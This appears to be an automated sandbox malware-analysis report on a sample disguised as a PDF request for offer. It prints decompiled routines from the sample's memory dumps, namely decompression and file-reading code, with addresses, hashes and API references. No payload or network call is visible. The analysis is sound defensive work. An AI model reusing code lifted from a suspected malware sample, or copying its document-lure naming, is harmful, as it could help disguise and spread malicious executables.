												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00406be3
0x00406be3
0x00406be7
0x00406c10
0x00406c1a
0x00406be9
0x00406bf2
0x00406bff
0x00406c02
0x00406f46
0x00406f46
0x00406f49
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00000000
0x00000000
0x00406f97
0x00406f9b
0x0040714a
0x00407160
0x00407168
0x0040716f
0x00407171
0x00407178
0x0040717c
0x0040717c
0x00406fa7
0x00406fae
0x00406fb6
0x00406fb9
0x00406fbc
0x00406fbc
0x00406fc2
0x00406fc2
0x0040675e
0x0040675e
0x0040675e
0x00406767
0x00000000
0x00000000
0x0040676d
0x00000000
0x00406778
0x00000000
0x00000000
0x00406781
0x00406784
0x00406787
0x0040678b
0x00000000
0x00000000
0x00406791
0x00406794
0x00406796
0x00406797
0x0040679a
0x0040679c
0x0040679d
0x0040679f
0x004067a2
0x004067a7
0x004067ac
0x004067b5
0x004067c8
0x004067cb
0x004067d7
0x004067ff
0x00406801
0x0040680f
0x0040680f
0x00406813
0x00000000
0x00000000
0x00000000
0x00000000
0x00406803
0x00406803
0x00406806
0x00406807
0x00406807
0x00000000
0x00406803
0x004067dd
0x004067e2
0x004067e2
0x004067eb
0x004067f3
0x004067f6
0x00000000
0x004067fc
0x004067fc
0x00000000
0x004067fc
0x00000000
0x00406819
0x00406819
0x0040681d
0x004070c9
0x00000000
0x004070c9
0x00406826
0x00406836
0x00406839
0x0040683c
0x0040683c
0x0040683c
0x0040683f
0x00406843
0x00000000
0x00000000
0x00406845
0x0040684b
0x00406875
0x0040687b
0x00406882
0x00000000
0x00406882
0x00406851
0x00406854
0x00406859
0x00406859
0x00406864
0x0040686c
0x0040686f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b4
0x004068ba
0x004068bd
0x004068ca
0x004068d2
0x00406f46
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688d
0x004070d8
0x00000000
0x004070d8
0x00406899
0x004068a4
0x004068a4
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068da
0x004068dc
0x004068df
0x00406950
0x00406953
0x00406956
0x0040695d
0x00406967
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f46
0x004068e1
0x004068e5
0x004068e8
0x004068ea
0x004068ed
0x004068f0
0x004068f2
0x004068f5
0x004068f7
0x004068fc
0x004068ff
0x00406902
0x00406906
0x0040690d
0x00406910
0x00406917
0x0040691b
0x00406923
0x00406923
0x00406923
0x0040691d
0x0040691d
0x0040691d
0x00406912
0x00406912
0x00406912
0x00406927
0x0040692a
0x00406948
0x0040694a
0x00000000
0x0040692c
0x0040692c
0x0040692f
0x00406932
0x00406935
0x00406937
0x00406937
0x00406937
0x0040693a
0x0040693d
0x0040693f
0x00406940
0x00406943
0x00000000
0x00406943
0x00000000
0x00406b79
0x00406b7d
0x00406b9b
0x00406b9e
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb6
0x00406bbd
0x00406bbe
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bce
0x00000000
0x00406bce
0x00406b7f
0x00406b82
0x00406b85
0x00406b8f
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00000000
0x00000000
0x00000000
0x00406c26
0x00406c2a
0x00000000
0x00000000
0x00406c30
0x00406c34
0x00000000
0x00000000
0x00406c3a
0x00406c3c
0x00406c40
0x00406c40
0x00406c43
0x00406c47
0x00000000
0x00000000
0x00406c97
0x00406c9b
0x00406ca2
0x00406ca5
0x00406ca8
0x00406cb2
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f46
0x00406c9d
0x00000000
0x00000000
0x00406cbe
0x00406cc2
0x00406cc9
0x00406ccc
0x00406ccf
0x00406cc4
0x00406cc4
0x00406cc4
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce1
0x00406ce4
0x00406ceb
0x00406cf0
0x00000000
0x00000000
0x00406d7e
0x00406d7e
0x00406d82
0x00407120
0x00000000
0x00407120
0x00406d88
0x00406d8b
0x00406d8e
0x00406d92
0x00406d95
0x00406d9b
0x00406d9d
0x00406d9d
0x00406d9d
0x00406da0
0x00406da3
0x00000000
0x00000000
0x00406973
0x00406973
0x00406977
0x004070e4
0x00000000
0x004070e4
0x0040697d
0x00406980
0x00406983
0x00406987
0x0040698a
0x00406990
0x00406992
0x00406992
0x00406992
0x00406995
0x00406998
0x00406998
0x0040699b
0x0040699e
0x00000000
0x00000000
0x004069a4
0x004069aa
0x00000000
0x00000000
0x004069b0
0x004069b0
0x004069b4
0x004069b7
0x004069ba
0x004069bd
0x004069c0
0x004069c1
0x004069c4
0x004069c6
0x004069cc
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069db
0x004069de
0x004069fa
0x004069fd
0x00406a00
0x00406a03
0x00406a0a
0x00406a0e
0x00406a10
0x00406a14
0x004069e0
0x004069e0
0x004069e4
0x004069ec
0x004069f1
0x004069f3
0x004069f5
0x004069f5
0x00406a17
0x00406a1e
0x00406a21
0x00000000
0x00406a27
0x00000000
0x00406a27
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x004070f0
0x00000000
0x004070f0
0x00406a36
0x00406a39
0x00406a3c
0x00406a40
0x00406a43
0x00406a49
0x00406a4b
0x00406a4b
0x00406a4b
0x00406a4e
0x00406a51
0x00406a51
0x00406a51
0x00406a57
0x00000000
0x00000000
0x00406a59
0x00406a5c
0x00406a5f
0x00406a62
0x00406a65
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a77
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a9b
0x00406a9f
0x00406aa1
0x00406a79
0x00406a79
0x00406a81
0x00406a86
0x00406a88
0x00406a8a
0x00406a8a
0x00406aa4
0x00406aab
0x00406aae
0x00000000
0x00406ab0
0x00000000
0x00406ab0
0x00406aae
0x00406ab5
0x00406ab5
0x00406ab5
0x00406ab5
0x00000000
0x00000000
0x00406af0
0x00406af0
0x00406af4
0x004070fc
0x00000000
0x004070fc
0x00406afa
0x00406afd
0x00406b00
0x00406b04
0x00406b07
0x00406b0d
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b12
0x00406b15
0x00406b15
0x00406b1b
0x00406ab9
0x00406ab9
0x00406abc
0x00000000
0x00406abc
0x00406b1d
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b38
0x00406b3b
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5c
0x00406b5f
0x00406b63
0x00406b65
0x00406b3d
0x00406b3d
0x00406b45
0x00406b4a
0x00406b4c
0x00406b4e
0x00406b4e
0x00406b68
0x00406b6f
0x00406b72
0x00000000
0x00406b74
0x00000000
0x00406b74
0x00000000
0x00406e01
0x00406e01
0x00406e05
0x0040712c
0x00000000
0x0040712c
0x00406e0b
0x00406e0e
0x00406e11
0x00406e15
0x00406e18
0x00406e1e
0x00406e20
0x00406e20
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406bd1
0x00406bd1
0x00406bd4
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00000000
0x00406f10
0x00406f14
0x00406f36
0x00406f39
0x00406f43
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f46
0x00406f16
0x00406f19
0x00406f1d
0x00406f20
0x00406f20
0x00406f23
0x00000000
0x00000000
0x00406fcd
0x00406fd1
0x00406fef
0x00406fef
0x00406fef
0x00406ff6
0x00406ffd
0x00407004
0x00407004
0x00000000
0x00407004
0x00406fd3
0x00406fd6
0x00406fd9
0x00406fdc
0x00406fe3
0x00406f27
0x00406f27
0x00406f2a
0x00000000
0x00000000
0x004070be
0x004070c1
0x00406fc2
0x00000000
0x00000000
0x00406cf8
0x00406cfa
0x00406d01
0x00406d02
0x00406d04
0x00406d07
0x00000000
0x00000000
0x00406d0f
0x00406d12
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d1a
0x00406d1d
0x00406d24
0x00406d27
0x00406d35
0x00000000
0x00000000
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00000000
0x00000000
0x0040701a
0x0040701a
0x0040701e
0x00407156
0x00000000
0x00407156
0x00407024
0x00407027
0x0040702a
0x0040702e
0x00407031
0x00407037
0x00407039
0x00407039
0x00407039
0x0040703c
0x0040703f
0x0040703f
0x0040703f
0x0040703f
0x00407042
0x00407042
0x00407046
0x004070a6
0x004070a9
0x004070ae
0x004070af
0x004070b1
0x004070b3
0x004070b6
0x00406fc2
0x00406fc2
0x00000000
0x00406fc8
0x00406fc2
0x00407048
0x0040704e
0x00407051
0x00407054
0x00407057
0x0040705a
0x0040705d
0x00407060
0x00407063
0x00407066
0x00407069
0x00407082
0x00407085
0x00407088
0x0040708b
0x0040708f
0x00407091
0x00407091
0x00407092
0x00407095
0x0040706b
0x0040706b
0x00407073
0x00407078
0x0040707a
0x0040707d
0x0040707d
0x00407098
0x0040709f
0x00000000
0x004070a1
0x00000000
0x004070a1
0x00000000
0x00406d3d
0x00406d40
0x00406d76
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea9
0x00406ea9
0x00406eac
0x00406eae
0x00407138
0x00000000
0x00407138
0x00406eb4
0x00406eb7
0x00000000
0x00000000
0x00406ebd
0x00406ec1
0x00406ec4
0x00406ec4
0x00406ec4
0x00000000
0x00406ec4
0x00406d42
0x00406d44
0x00406d46
0x00406d48
0x00406d4b
0x00406d4c
0x00406d4e
0x00406d50
0x00406d53
0x00406d56
0x00406d6c
0x00406d71
0x00406da9
0x00406da9
0x00406dad
0x00406dd9
0x00406ddb
0x00406de2
0x00406de5
0x00406de8
0x00406de8
0x00406ded
0x00406ded
0x00406def
0x00406df2
0x00406df9
0x00406dfc
0x00406e29
0x00406e29
0x00406e2c
0x00406e2f
0x00406ea3
0x00406ea3
0x00406ea3
0x00000000
0x00406ea3
0x00406e31
0x00406e37
0x00406e3a
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e49
0x00406e4c
0x00406e4f
0x00406e52
0x00406e6b
0x00406e6d
0x00406e70
0x00406e71
0x00406e74
0x00406e76
0x00406e79
0x00406e7b
0x00406e7d
0x00406e80
0x00406e82
0x00406e85
0x00406e89
0x00406e8b
0x00406e8b
0x00406e8c
0x00406e8f
0x00406e92
0x00406e54
0x00406e54
0x00406e5c
0x00406e61
0x00406e63
0x00406e66
0x00406e66
0x00406e95
0x00406e9c
0x00406e26
0x00406e26
0x00406e26
0x00406e26
0x00000000
0x00406e9e
0x00000000
0x00406e9e
0x00406e9c
0x00406daf
0x00406db2
0x00406db4
0x00406db7
0x00406dba
0x00406dbd
0x00406dbf
0x00406dc2
0x00406dc5
0x00406dc5
0x00406dc8
0x00406dc8
0x00406dcb
0x00406dd2
0x00406da6
0x00406da6
0x00406da6
0x00406da6
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406d58
0x00406d5b
0x00406d5d
0x00406d60
0x00000000
0x00000000
0x00406abf
0x00406abf
0x00406ac3
0x00407108
0x00000000
0x00407108
0x00406ac9
0x00406acc
0x00406acf
0x00406ad2
0x00406ad5
0x00406ad8
0x00406adb
0x00406add
0x00406ae0
0x00406ae3
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae8
0x00000000
0x00000000
0x00406c4a
0x00406c4a
0x00406c4e
0x00407114
0x00000000
0x00407114
0x00406c54
0x00406c57
0x00406c5a
0x00406c5d
0x00406c5f
0x00406c5f
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c71
0x00406c72
0x00406c74
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c80
0x00406c80
0x00406c80
0x00406c83
0x00406c85
0x00406c85
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406ec7
0x00406ecb
0x00000000
0x00000000
0x00406ed1
0x00406ed4
0x00406ed7
0x00406eda
0x00406edc
0x00406edc
0x00406edc
0x00406edf
0x00406ee2
0x00406ee5
0x00406ee8
0x00406eeb
0x00406eee
0x00406eef
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f04
0x00406f06
0x00406f09
0x00000000
0x00406f0b
0x00406c88
0x00406c88
0x00000000
0x00406c88
0x00406f09
0x0040713e
0x00000000
0x00000000
0x0040676d
0x00407175
0x00407175
0x00000000
0x00407175
0x00406fc2
0x00406f49
0x00406f46

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
Instruction ID: 57281eb70c6d5ee4f1dcb93120720bdacd8771e53a80a41a257af2ecf5b7c0f8
Opcode Fuzzy Hash: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
Instruction Fuzzy Hash: 7C714431D04229DBEF28CF98C844BADBBB1FF44305F11806AD856BB291C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00403283 Relevance: 4.6, APIs: 3, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403283(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x418ed4; // 0x3bd04
				_t34 = _t32 -  *0x40ce40 + _a4;
				 *0x42a24c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402E33(1);
					return 0;
				}
				E00403402( *0x418ee4);
				SetFilePointer( *0x40a01c,  *0x40ce40, 0, 0); // executed
				 *0x418ee0 = _t34;
				 *0x418ed0 = 0;
				while(1) {
					_t10 =  *0x418ed8; // 0x2f9a7
					_t31 = 0x4000;
					_t11 = _t10 -  *0x418ee4;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004033EC(0x414ed0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x418ee4 =  *0x418ee4 + _t31;
					 *0x40ce60 = 0x414ed0;
					 *0x40ce64 = _t31;
					L6:
					L6:
					if( *0x42a250 != 0 &&  *0x42a2e0 == 0) {
						_t19 =  *0x418ee0; // 0x54d5
						 *0x418ed0 = _t19 -  *0x418ed4 - _a4 +  *0x40ce40;
						E00402E33(0);
					}
					 *0x40ce68 = 0x40ced0;
					 *0x40ce6c = 0x8000; // executed
					_t14 = E0040672B(0x40ce48); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce68; // 0x411297
					_t37 = _t36 - 0x40ced0;
					if(_t37 == 0) {
						__eflags =  *0x40ce64; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x418ed4; // 0x3bd04
						if(_t16 -  *0x40ce40 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405E99( *0x40a01c, 0x40ced0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce40 =  *0x40ce40 + _t37;
					_t49 =  *0x40ce64; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x00403286
0x00403293
0x004032a6
0x004032ab
0x004033db
0x004033dd
0x00000000
0x004033e3
0x004032b7
0x004032ca
0x004032d0
0x004032d6
0x004032e1
0x004032e1
0x004032e6
0x004032eb
0x004032f3
0x004032f5
0x004032f5
0x004032fe
0x00403305
0x00000000
0x00000000
0x0040330b
0x00403311
0x00403317
0x00000000
0x0040331d
0x00403323
0x0040332d
0x00403343
0x00403348
0x0040334d
0x00403353
0x00403359
0x00403363
0x0040336a
0x00000000
0x00000000
0x0040336c
0x00403372
0x00403374
0x00403397
0x0040339d
0x00000000
0x00000000
0x0040339f
0x004033a1
0x00000000
0x00000000
0x004033a3
0x004033a3
0x004033b6
0x00000000
0x00000000
0x004033c5
0x00000000
0x004033c5
0x0040337e
0x00403385
0x004033d2
0x004033d8
0x004033d8
0x00000000
0x004033d8
0x00403387
0x0040338d
0x00403393
0x00000000
0x00000000
0x00000000
0x004033d6
0x004033d6
0x00000000
0x004033d6
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00403297

Part of subcall function 00403402: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004032CA
SetFilePointer.KERNELBASE(0003BD04,00000000,00000000,00414ED0,00004000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000), ref: 004033C5

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
